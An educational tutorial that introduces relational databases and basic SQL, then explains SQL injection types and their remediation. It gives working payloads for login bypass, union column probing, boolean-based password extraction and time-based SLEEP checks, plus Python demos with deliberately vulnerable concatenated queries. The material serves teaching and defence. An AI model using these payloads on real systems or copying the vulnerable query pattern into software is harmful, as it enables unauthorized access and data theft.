Preface

Welcome to the realm of SQL injection vulnerabilities, a journey marked with technical acuity and not a playground for the uninitiated. Be forewarned, this serves as an enlightening resource, not a charter for unethical activity. Before setting sail into the intricacies of exploits, let’s embark on understanding some fundamental terminologies and structures related to databases.

If you’re not experienced in dealing with databases or exploiting them, there is likely some new terminology to learn, so let’s begin with the fundamentals of how databases are organized and function.

Database: A Primer

Think of a database as an elaborate, electronic treasure chest for your data, governed by a DBMS (Database Management System). These system overseers bifurcate into two camps: Relational and Non-Relational. Our exploration will predominantly focus on the realm of Relational DBMS, delving into the likes of MySQL, Microsoft SQL Server, Access, PostgreSQL, and SQLite.

Picture a DBMS as a grand library with each database as a distinct tome within it. For example, a “shop” database might store discrete sets of data like products, registered users, and orders—each depicted by a unique table within the database.

Tables: The Foundation of Databases

Tables, built with columns (fields) and rows (records), form the fundamental building blocks of databases. Imagine them as a grid: the column headings run across the top from left to right and name each kind of data, while the rows run from top to bottom and contain the actual data.

Columns: The Organizing Principle

Each field has a name that is unique within its table and dictates the kind of data it will hold. Data types range from the commonplace, such as integers, text, and dates, to complex data like geographical locations in advanced databases. Setting the data type also acts as a sentry that obstructs irrelevant input: for example, a “hello world” string in a date column would often raise an error. An integer field may have an auto-increment attribute, giving each row a unique number that increases sequentially; such a column is known as a ‘key field’. Because the key is unique to each row, SQL queries can use it to locate that row precisely.
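To make the idea of typed columns and an auto-incrementing key field concrete, here is a minimal sketch using Python's built-in sqlite3 module. The table layout and the sample names are assumptions made purely for illustration.

```python
import sqlite3

# In-memory SQLite database; table and column names are illustrative only.
conn = sqlite3.connect(":memory:")
conn.execute(
    """
    CREATE TABLE users (
        id       INTEGER PRIMARY KEY AUTOINCREMENT,  -- the key field
        username TEXT NOT NULL,
        joined   DATE
    )
    """
)

# The id column is never supplied; the database assigns it.
conn.execute("INSERT INTO users (username, joined) VALUES ('alice', '2024-01-05')")
conn.execute("INSERT INTO users (username, joined) VALUES ('bob', '2024-02-11')")

rows = conn.execute("SELECT id, username FROM users ORDER BY id").fetchall()
print(rows)
```

Note that SQLite is lenient about column types, so it will not necessarily reject a mismatched value the way stricter database servers do.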

Rows: The Bearers of Data

In the context of databases, rows or records are individual data entries within a table. Each row stands for a unique instance of data.

Adding new data equals creating a new row; deleting data leads to row removal. A row’s deletion erases all its associated data—unlike emptying fields within the row, the row itself is eliminated, leaving no trace.

These independent rows, through their collective contribution, enable efficient data management and retrieval, fueling the complex operations databases perform.

Relational vs Non-Relational Databases: The Divide

A relational database shelters data in tables that are constantly in conversation. Here, columns define the data parameters while rows store the data itself. These tables usually possess a uniquely identified column (primary key) which other tables reference to establish inter-table relationships, hence the ‘relational’ tag.

In stark contrast, Non-Relational (or NoSQL) databases abandon the rigid structure of tables, columns, and rows. In this arrangement, each data row can contain different information, offering more flexibility than their relational counterparts. Notable examples of this database variant include MongoDB, Cassandra, and Elasticsearch.

What is SQL

SQL (Structured Query Language) is a language with numerous features used to query databases; these SQL queries are best referred to as statements.

The most basic SQL commands, covered in this lesson, are used to retrieve (select), update, insert, and delete data. Although database servers are broadly similar, some have their own syntax and subtle differences in operation.

SELECT

select * from users;

The first word SELECT instructs the database to retrieve certain data, whereas the * instructs the database to return all columns from the table. For instance, there may be three columns in the table (id, username, and password). “from users” tells the database to fetch the data from the users table. The final semicolon informs the database that the query has reached its end.

select username,password from users;

The next query is identical to the preceding one, but instead of using the * to return all columns in the database table, we are requesting only the username and password fields.

select * from users LIMIT 1;

Like the first query, this one returns all columns using the * selector, but the “LIMIT 1” clause restricts the database to returning only one row of data. Changing the clause to “LIMIT 1,1” skips the first result, “LIMIT 2,1” skips the first two results, and so on. Remember that the first number tells the database how many rows to skip, while the second number specifies how many rows to return.

select * from users where username='admin';

Finally, we will utilize the where clause, which allows us to precisely choose the data we need by returning just the records that match our criteria.

This will only return rows where the username matches admin.
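The SELECT variations above can be tried against a throwaway database. The following is a minimal sketch using Python's built-in sqlite3 module; the three sample users and their passwords are made up for illustration, and SQLite happens to accept the same two-number LIMIT form discussed above.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.executemany(
    "INSERT INTO users (username, password) VALUES (?, ?)",
    [("admin", "p4ssword"), ("martin", "pa$$word"), ("jon", "secret123")],
)

# Every column of every row.
all_rows = conn.execute("select * from users;").fetchall()

# Only the two named columns.
two_cols = conn.execute("select username,password from users;").fetchall()

# Only the first row.
first = conn.execute("select * from users LIMIT 1;").fetchall()

# Skip one row, then return one row.
second = conn.execute("select * from users LIMIT 1,1;").fetchall()

# Only rows whose username is admin.
admin = conn.execute("select * from users where username='admin';").fetchall()

print(first, second, admin)
```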

UNION

The UNION statement combines the results of two or more SELECT statements to retrieve data from a single table or multiple tables. The rules are that each SELECT statement must retrieve the same number of columns, the columns must have similar data types, and the column order must be identical.
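As a rough illustration of the column-count rule, the sketch below runs one valid UNION and one mismatched UNION with Python's sqlite3 module. The customers and suppliers tables are hypothetical and exist only for this example.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE customers (name TEXT, city TEXT);
    CREATE TABLE suppliers (company TEXT, city TEXT);
    INSERT INTO customers VALUES ('Mr John Smith', 'London');
    INSERT INTO suppliers VALUES ('Widgets Ltd', 'Glasgow');
    """
)

# Two columns on each side, so the results are merged into one list.
combined = conn.execute(
    "SELECT name, city FROM customers "
    "UNION SELECT company, city FROM suppliers ORDER BY 2"
).fetchall()

# Two columns on the left but one on the right: the database refuses the query.
try:
    conn.execute("SELECT name, city FROM customers UNION SELECT company FROM suppliers")
    mismatch_error = None
except sqlite3.OperationalError as exc:
    mismatch_error = str(exc)

print(combined)
print(mismatch_error)
```

This error on a mismatched column count is exactly what an attacker relies on later when probing how many columns a vulnerable query returns.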

INSERT

insert into users (username,password) values ('bob','p4ssw8rd123');

The INSERT statement instructs the database to insert a new data row into a table. “into users” informs the database of the table into which we wish to insert the data, “(username,password)” specifies the fields for which we are supplying data, and “values ('bob','p4ssw8rd123');” supplies the data for the requested columns.

UPDATE

update users SET username='root',password='pass123' where username='admin';

The UPDATE statement informs the database that one or more rows of data within a table should be updated. You indicate the table you wish to update with “update %tablename% SET”, followed by a comma-separated list of the field or fields you wish to update, such as “username='root',password='pass123'”. As with the SELECT statement, you can specify precisely which rows to update with the where clause, such as “where username='admin';”.

DELETE

delete from users where username='julie';

The DELETE statement informs the database that one or more rows of data should be deleted. Except for the absence of the columns you wish to be returned, this query is nearly identical to the SELECT. Using the where clause and the LIMIT clause, you can specify exactly which data is deleted and how many rows are removed, respectively.
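The three data-changing statements can be run back to back to see their combined effect. This is a minimal sketch with Python's sqlite3 module; the starting rows (admin and julie) are assumed sample data.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.executemany(
    "INSERT INTO users (username, password) VALUES (?, ?)",
    [("admin", "oldpass"), ("julie", "letmein")],
)

# INSERT adds a new row.
conn.execute("insert into users (username,password) values ('bob','p4ssw8rd123');")

# UPDATE changes the matching row; rowcount reports how many rows were touched.
cur = conn.execute(
    "update users SET username='root',password='pass123' where username='admin';"
)
updated = cur.rowcount

# DELETE removes the matching row entirely.
cur = conn.execute("delete from users where username='julie';")
deleted = cur.rowcount

remaining = [row[0] for row in conn.execute("select username from users order by id")]
print(updated, deleted, remaining)
```

A stock SQLite build does not accept LIMIT on a DELETE statement, which is one of the server-specific differences mentioned earlier, so the sketch leaves it out.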



What is SQL Injection?

A SQL injection attack consists of the insertion or “injection” of a SQL query into an application’s input data from the client.

A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover the content of a given file on the DBMS file system, and in some cases issue commands to the operating system.

SQL injection attacks are a form of injection attack in which SQL commands are injected into the data-plane input to influence the execution of predetermined SQL commands.

In-Band SQL Injection

In-Band SQL Injection is the easiest type to detect and exploit; In-Band simply refers to the same method of communication being used to exploit the vulnerability and also receive the results, such as discovering a SQL Injection vulnerability on a website page and then being able to extract database data from the same page.

Error-Based SQL Injection

Error messages from the database are printed directly to the browser’s screen, making this method of SQL Injection the most effective for acquiring information about the database’s structure. This is frequently used to enumerate an entire database.

Union-Based SQL Injection

This type of injection uses the SQL UNION operator in conjunction with a SELECT statement to return extra results to the page. This is the most prevalent technique for retrieving massive quantities of data via a SQL Injection vulnerability.

Blind SQLi

In contrast to In-Band SQL injection, where the results of our attack are displayed directly on the screen, blind SQLi occurs when we receive little to no feedback to confirm whether our injected queries were successful or not.

This is because the error messages have been disabled, but the injection still works. It may surprise you that we just require this small amount of feedback to successfully enumerate an entire database.

Authentication Bypass

Bypassing authentication measures, such as login forms, is one of the most basic Blind SQL Injection techniques. In this situation, we are less concerned with retrieving data from the database than with completing the login process.

Typically, login forms that are connected to a database of users are designed so that the web application is not concerned with the contents of the username and password, but rather with whether they form a matching pair in the users table.

The web application asks the database, “Do you have a user with the username john and the password john123?” and the database responds with either yes or no (true/false). Depending on the database’s response, the web program determines whether or not you can proceed.

Considering the above information, it is unnecessary to list valid username/password combinations. Simply write a database query that returns the value yes/true.

To make this into a query that always returns as true, we can enter the following into the password field:

' OR 1=1;--

Why does this work?

The ' character closes the quoted string in the SQL query.

OR in a SQL statement returns true if either side of it is true. As 1=1 is always true, the whole condition is true, so the database reports a match and the application logs us in.

The -- sequence starts a comment in SQL, so anything that follows it in the query, including any further restrictions on the login, is ignored.

Because 1=1 is a true statement and we’ve used the OR operator, the query will always return true, satisfying the web application’s logic that the database found an acceptable username/password combination and access should be permitted.

Suppose the web application builds its login query like this:

select * from users where username='%username%' and password='%password%' LIMIT 1;

Entering the payload in the password field, with the username left blank, turns the SQL query into the following:

select * from users where username='' and password='' OR 1=1;
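The bypass can be reproduced against a deliberately vulnerable login check. The sketch below is an assumption about how such an application might build its query (plain string concatenation); the vulnerable_login function and the john/john123 account are hypothetical, and SQLite stands in for whatever database the real application uses.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.execute("INSERT INTO users (username, password) VALUES ('john', 'john123')")


def vulnerable_login(username: str, password: str) -> bool:
    """Hypothetical login check that pastes user input straight into the SQL text."""
    query = (
        "select * from users where username='" + username
        + "' and password='" + password + "' LIMIT 1;"
    )
    # Any returned row is treated as a matching username/password pair.
    return conn.execute(query).fetchone() is not None


legit = vulnerable_login("john", "john123")    # correct credentials
wrong = vulnerable_login("john", "guess")      # wrong password
bypass = vulnerable_login("", "' OR 1=1;--")   # no credentials at all

print(legit, wrong, bypass)
```

The third call succeeds without a valid username or password because the payload rewrites the condition so that it is always true and comments out the rest of the query.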

Boolean Based

Boolean-based SQL Injection is named for the response we receive from our injection attempts, which may be true/false, yes/no, on/off, 1/0, or any other response with only two possible outcomes. That outcome tells us whether our SQL injection payload was successful or not.

At first glance, this brief response may not appear to provide much information. Nevertheless, using only these two responses, it is possible to enumerate the entire database’s structure and contents.

Consider an API endpoint that, when queried with the username admin, returns a body containing “taken”:true in the browser. This endpoint replicates a common feature present on many signup forms, which prompts the user to choose a different username if the username has already been registered. We can infer that the username admin is already registered since the taken value is set to true.

We can verify this by changing the username in the browser’s address bar from admin to admin1 and pressing Enter: the taken value changes from true to false.

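Example:

admin1' UNION SELECT 1,2,3;--

admin1' UNION SELECT 1,2,3 from users where username='admin' and password like 'admin123%

The first payload returns true only when the UNION supplies the same number of columns as the original query (three here). The second returns true only when the admin user’s password begins with admin123. Its final quote is left open, presumably because the application’s own query supplies the closing quote.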
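To show how a single true/false answer is enough to recover data, here is a minimal sketch that rebuilds a password one character at a time. The is_taken function is a hypothetical stand-in for the username-availability endpoint, assumed to concatenate input into its query; the admin/admin123 account is sample data, and SQLite is used only so the example runs on its own.

```python
import sqlite3
import string

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'admin123')")


def is_taken(username: str) -> bool:
    """Hypothetical vulnerable endpoint: reveals only whether a row came back."""
    query = "select * from users where username = '" + username + "' LIMIT 1;"
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False  # errors are hidden from the caller


def extract_password(target: str) -> str:
    """Grow a known prefix while the true/false answer keeps confirming it."""
    # Lowercase letters and digits only: LIKE ignores ASCII case in SQLite,
    # and the LIKE wildcards % and _ are deliberately left out.
    alphabet = string.ascii_lowercase + string.digits
    known = ""
    while True:
        for ch in alphabet:
            payload = (
                "admin1' UNION SELECT 1,2,3 from users "
                f"where username='{target}' and password like '{known + ch}%"
            )
            if is_taken(payload):
                known += ch
                break
        else:
            return known  # no character extends the prefix, so we are done


three_columns = is_taken("admin1' UNION SELECT 1,2,3;--")
two_columns = is_taken("admin1' UNION SELECT 1,2;--")
recovered = extract_password("admin")
print(three_columns, two_columns, recovered)
```

Each request leaks only one bit, yet a few hundred requests are enough to recover the whole value, which is why disabling error messages alone does not stop the attack.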

Time-Based

A time-based blind SQL Injection is quite similar to the preceding Boolean-based variant in that identical requests are issued, but this time there is no visual indication of whether your queries are correct or incorrect.

Instead, the correctness of a query is determined by how long it takes to complete. This delay is produced by combining the UNION statement with built-in functions such as SLEEP(x). SLEEP() is only executed when the UNION SELECT statement succeeds, so a delayed response indicates a correct query.

Example:

admin1' UNION SELECT SLEEP(5);--
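The timing side channel can be sketched in a few lines. SQLite has no SLEEP() function, so this example registers a Python function under that name purely as a stand-in for the built-in found on servers such as MySQL. The lookup function is a hypothetical endpoint that returns the same response no matter what happens, and the delay is shortened to 0.3 seconds to keep the example quick.

```python
import sqlite3
import time

DELAY = 0.3  # seconds; shortened from the 5 used in the payload above

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT)")
conn.execute("INSERT INTO users VALUES ('admin')")


def _sleep(seconds):
    """Stand-in for a server-side SLEEP(); an assumption for this sketch only."""
    time.sleep(seconds)
    return 0


conn.create_function("SLEEP", 1, _sleep)


def lookup(username: str) -> str:
    """Hypothetical vulnerable endpoint that gives no visible feedback."""
    query = "select username from users where username='" + username + "' LIMIT 1;"
    try:
        conn.execute(query).fetchall()
    except sqlite3.Error:
        pass  # errors are swallowed, so the response never changes
    return "ok"


def timed(payload: str) -> float:
    start = time.perf_counter()
    lookup(payload)
    return time.perf_counter() - start


# The original query returns one column, so a one-column UNION is valid and sleeps.
one_column = timed(f"admin1' UNION SELECT SLEEP({DELAY});--")

# A two-column UNION is rejected before it runs, so no delay occurs.
two_columns = timed(f"admin1' UNION SELECT SLEEP({DELAY}),2;--")

print(round(one_column, 2), round(two_columns, 2))
```

Only the response time separates the two cases: the slow request tells the attacker the column count was right.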

Remediation

As damaging as SQL Injection vulnerabilities are, developers can defend web applications from them by adhering to the recommendations below.

Prepared Statements (With Parameterized Queries)

In a prepared query, the SQL query is written first, followed by any user-supplied parameters. Writing prepared statements guarantees that the SQL code structure does not change and that the database is able to differentiate between the query and the data. Additionally, it makes your code much clearer and easier to read.
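A parameterized version of a login check might look like the sketch below, written with Python's sqlite3 module and its ? placeholders. The safe_login function and the john/john123 account are hypothetical; other drivers use different placeholder styles, so treat this as one possible shape and not the only one.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.execute("INSERT INTO users (username, password) VALUES ('john', 'john123')")


def safe_login(username: str, password: str) -> bool:
    """The SQL text is fixed; user input is passed separately as parameters."""
    query = "select * from users where username=? and password=? LIMIT 1;"
    return conn.execute(query, (username, password)).fetchone() is not None


legit = safe_login("john", "john123")
attack = safe_login("", "' OR 1=1;--")  # treated as a literal password string

print(legit, attack)
```

The payload is compared against the password column as ordinary text, so it cannot change the structure of the query.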

Input Validation

Input validation can go a long way toward protecting the data that ends up in a SQL query. One approach is an allow list that restricts input to specific strings; another is a string replacement mechanism in the programming language that filters which characters are allowed or refused.
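Both flavors of allow list can be sketched briefly in Python. The username pattern (letters, digits, and underscores, 3 to 20 characters) and the set of permitted sort columns are assumptions chosen for illustration; a real application would pick rules that match its own data.

```python
import re

# Allow list of characters: letters, digits, and underscores, 3 to 20 long.
USERNAME_PATTERN = re.compile(r"[A-Za-z0-9_]{3,20}")

# Allow list of specific strings, e.g. for a value that selects a column name.
ALLOWED_SORT_COLUMNS = {"id", "username"}


def is_valid_username(value: str) -> bool:
    """Accept the value only if every character is on the allow list."""
    return USERNAME_PATTERN.fullmatch(value) is not None


def pick_sort_column(value: str) -> str:
    """Fall back to a safe default unless the value is on the allow list."""
    return value if value in ALLOWED_SORT_COLUMNS else "id"


print(is_valid_username("admin1"))
print(is_valid_username("admin1' UNION SELECT 1,2,3;--"))
print(pick_sort_column("username"))
print(pick_sort_column("username; drop table users"))
```

Validation of this kind works best alongside parameterized queries, not as a replacement for them.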

Escaping User Input

Allowing user input that includes characters such as ' " $ can cause SQL queries to fail or, worse, as we’ve seen, leave them vulnerable to injection attacks. Escaping user input means placing a backslash (\) before such characters, which causes them to be parsed as part of a regular string and not as special characters.

Source and More info @

https://github.com/payloadbox/sql-injection-payload-list

https://owasp.org/www-community/attacks/SQL_Injection

https://owasp.org/www-community/attacks/Blind_SQL_Injection
